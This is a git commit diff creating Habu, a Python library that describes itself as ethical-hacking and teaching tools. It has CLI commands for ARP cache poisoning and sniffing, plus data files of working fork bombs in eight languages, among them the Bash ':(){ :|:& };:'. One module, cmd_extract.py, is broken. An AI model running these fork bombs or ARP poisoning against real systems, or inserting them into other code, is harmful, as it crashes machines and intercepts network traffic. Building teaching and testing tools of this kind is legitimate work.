first commit

.gitignore

@@ -0,0 +1,87 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+env/
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+parts/
+sdist/
+var/
+*.egg-info/
+.installed.cfg
+*.egg
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*,cover
+.hypothesis/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# IPython Notebook
+.ipynb_checkpoints
+
+# pyenv
+.python-version
+
+# celery beat schedule file
+celerybeat-schedule
+
+# dotenv
+.env
+
+# virtualenv
+venv/
+ENV/
+
+# Spyder project settings
+.spyderproject
+
+# Rope project settings
+.ropeproject

.gitlab-ci.yml

@@ -0,0 +1,10 @@
+test:
+  script:
+  - apt-get update -qy
+  - apt-get install -y python3-dev python3-pip
+  - pip3 install virtualenv
+  - virtualenv --python=/usr/bin/python3 venv
+  - venv/bin/pip install -r requirements.txt
+  - venv/bin/pip install -r dev-requirements.txt
+  - venv/bin/pip install -e .
+  - venv/bin/python setup.py pytest

README.rst

@@ -0,0 +1,25 @@
+Habu: Ethical Hacking utilities / library
+=========================================
+
+These are basic functions that help with some tasks for Ethical Hacking and Penetration Testing.
+
+I'm developing Habu to teach (and learn) some concepts about Python and Hacking.
+
+Much of the functions are really basic (like get our public IP address), but are really useful in some cases.
+
+Installation
+------------
+
+To install Habu, simply:
+
+.. code-block:: bash
+
+    $ pip install habu
+
+Dependencies
+------------
+Habu requires:
+
+- Python (3.x),
+- Requests (2.x),
+- Click (6.x).

dev-requirements.txt

@@ -0,0 +1,4 @@
+flake8
+pytest
+pytest-runner
+pyroma

habu/cli/cmd_arpoison.py

@@ -0,0 +1,13 @@
+import click
+from habu.lib.arpoison import arpoison
+
+
+@click.command()
+@click.argument('target1')
+@click.argument('target2')
+def cmd_arpoison(target1, target2):
+    """ARP cache poison"""
+    arpoison(target1, target2)
+
+if __name__ == '__main__':
+    cmd_arpoison()

habu/cli/cmd_arpsniff.py

@@ -0,0 +1,40 @@
+from time import time
+import click
+import habu.lib.manuf
+from scapy.all import ARP, IP, TCP, sniff
+
+hosts = {}
+
+mac2vendor = habu.lib.manuf.MacParser()
+
+def procpkt(pkt):
+
+    now = time()
+    output = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'
+
+    if 'ARP' in pkt:
+        hosts[pkt[ARP].psrc] = {}
+        hosts[pkt[ARP].psrc]['hwaddr'] = pkt[ARP].hwsrc
+        hosts[pkt[ARP].psrc]['vendor'] = mac2vendor.get_comment(pkt[ARP].hwsrc)
+        hosts[pkt[ARP].psrc]['time'] = time()
+
+        click.clear()
+
+        for ip in sorted(hosts):
+            print(output.format(
+                seconds = int(now - hosts[ip]['time']),
+                ip = ip,
+                hwaddr = hosts[ip]['hwaddr'],
+                vendor = hosts[ip]['vendor']
+            ))
+
+
+@click.command()
+def cmd_arpsniff():
+    """ ARP Sniffer """
+    sniff(filter="arp", store=False, prn=procpkt)
+
+
+if __name__ == '__main__':
+    cmd_arpsniff()
+

habu/cli/cmd_contest.py

@@ -0,0 +1,12 @@
+import click
+from habu.lib import contest
+
+
+@click.command()
+def cmd_contest():
+    """Example script."""
+    print("IP:   %s" % contest.check_ip())
+    print("DNS:  %s" % contest.check_dns())
+    print("FTP: %s" % contest.check_ftp())
+    print("HTTP: %s" % contest.check_http())
+    print("HTTPS: %s" % contest.check_https())

habu/cli/cmd_eicar.py

@@ -0,0 +1,10 @@
+import click
+from habu.lib.eicar import eicar
+
+@click.command()
+def cmd_eicar():
+    """EICAR test data"""
+    print(eicar())
+
+if __name__ == '__main__':
+    cmd_eicar()

habu/cli/cmd_extract.py

@@ -0,0 +1,15 @@
+import click
+from habu.lib import extract
+
+
+@click.command()
+@click.option('-k', default='0', help='Encryption key')
+@click.option('-i', type=click.File('rb'), required=True, help='Input file')
+@click.option('-o', type=click.File('wb'), required=True, help='Output file')
+def cmd_extract(k, i, o):
+    """XOR cipher"""
+    o.write(xor(i.read(), k.encode()))
+
+
+if __name__ == '__main__':
+    cmd_xor()

habu/cli/cmd_forkbomb.py

@@ -0,0 +1,13 @@
+import click
+from habu.lib.forkbomb import bombs, get_bomb
+
+
+@click.command()
+@click.argument('bomb', type=click.Choice(bombs))
+def cmd_forkbomb(bomb):
+    """Fork Bombs"""
+    print(get_bomb(bomb))
+
+
+if __name__ == '__main__':
+    cmd_forkbomb()

habu/cli/cmd_hasher.py

@@ -0,0 +1,20 @@
+import click
+from habu.lib.hasher import hasher
+
+
+@click.command()
+@click.argument('f', type=click.File('rb'))
+def cmd_hasher(f):
+    """Hasher"""
+
+    data = f.read()
+
+    if not data:
+        print("Empty file or string!")
+    else:
+        for algo, result in hasher(data).items():
+            print("%s: %s" %(algo, result))
+
+
+if __name__ == '__main__':
+    cmd_hasher()

habu/cli/cmd_help.py

@@ -0,0 +1,28 @@
+import click
+
+help_text = [
+    ('habu.arpoison', 'ARP cache poisoner *'),
+    ('habu.arpsniff', 'ARP sniffer *'),
+    ('habu.contest', 'Check internet connection capabilities'),
+    ('habu.eicar', 'Print EICAR antimalware test data'),
+    ('habu.forkbomb', 'Show various forkbomb examples'),
+    ('habu.hasher', 'Calculate hashes using various algorithms'),
+    ('habu.help', 'Print this help message'),
+    ('habu.ip', 'Show your public IP'),
+    ('habu.update', 'Update data files'),
+    ('habu.xor', 'XOR cipher'),
+
+]
+
+@click.command()
+def cmd_help():
+    """Habu help"""
+
+    print('* = Need root privileges')
+
+    for c, h in help_text:
+        print('%-20s%-12s' % (c, h))
+
+if __name__ == '__main__':
+    cmd_help()
+

habu/cli/cmd_ip.py

@@ -0,0 +1,8 @@
+import click
+from habu.lib.ip import get_ip
+
+
+@click.command()
+def cmd_ip():
+    """Example script."""
+    print(get_ip())

habu/cli/cmd_update.py

@@ -0,0 +1,12 @@
+import click
+import habu.lib.manuf
+
+@click.command()
+def cmd_update():
+    """ Data files updater """
+    m = habu.lib.manuf.MacParser()
+    m.update()
+
+if __name__ == '__main__':
+    cmd_update()
+

habu/cli/cmd_xor.py

@@ -0,0 +1,15 @@
+import click
+from habu.lib.xor import xor
+
+
+@click.command()
+@click.option('-k', default='0', help='Encryption key')
+@click.option('-i', type=click.File('rb'), required=True, help='Input file')
+@click.option('-o', type=click.File('wb'), required=True, help='Output file')
+def cmd_xor(k, i, o):
+    """XOR cipher"""
+    o.write(xor(i.read(), k.encode()))
+
+
+if __name__ == '__main__':
+    cmd_xor()

habu/conf.py

@@ -0,0 +1,10 @@
+import os
+
+FILEDIR = os.path.dirname(os.path.abspath(__file__))
+DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
+workspace = '/tmp/habu-workspace'
+
+SERVICES_FILE_TCP = os.path.abspath(os.path.join(DATADIR, 'services-tcp'))
+SERVICES_FILE_UDP = os.path.abspath(os.path.join(DATADIR, 'services-udp'))
+
+

habu/data/forkbomb/bash.txt

@@ -0,0 +1 @@
+:(){ :|:& };:

habu/data/forkbomb/batch.txt

@@ -0,0 +1 @@
+%0|%0

habu/data/forkbomb/c.txt

@@ -0,0 +1,10 @@
+#include <unistd.h>
+
+int main()
+{
+    while(1)
+    {
+        fork();
+    }
+    return 0;
+}

habu/data/forkbomb/haskell.txt

@@ -0,0 +1,4 @@
+import Control.Monad
+import System.Posix.Process
+
+forkBomb = forever $ forkProcess forkBomb

habu/data/forkbomb/perl.txt

@@ -0,0 +1 @@
+fork while fork

habu/data/forkbomb/php.txt

@@ -0,0 +1 @@
+while(pcntl_fork()|1);

habu/data/forkbomb/python.txt

@@ -0,0 +1,4 @@
+import os
+
+while True:
+     os.fork()

habu/data/forkbomb/ruby.txt

@@ -0,0 +1,3 @@
+def forkbomb
+  loop { fork { forkbomb }  }
+end; forkbomb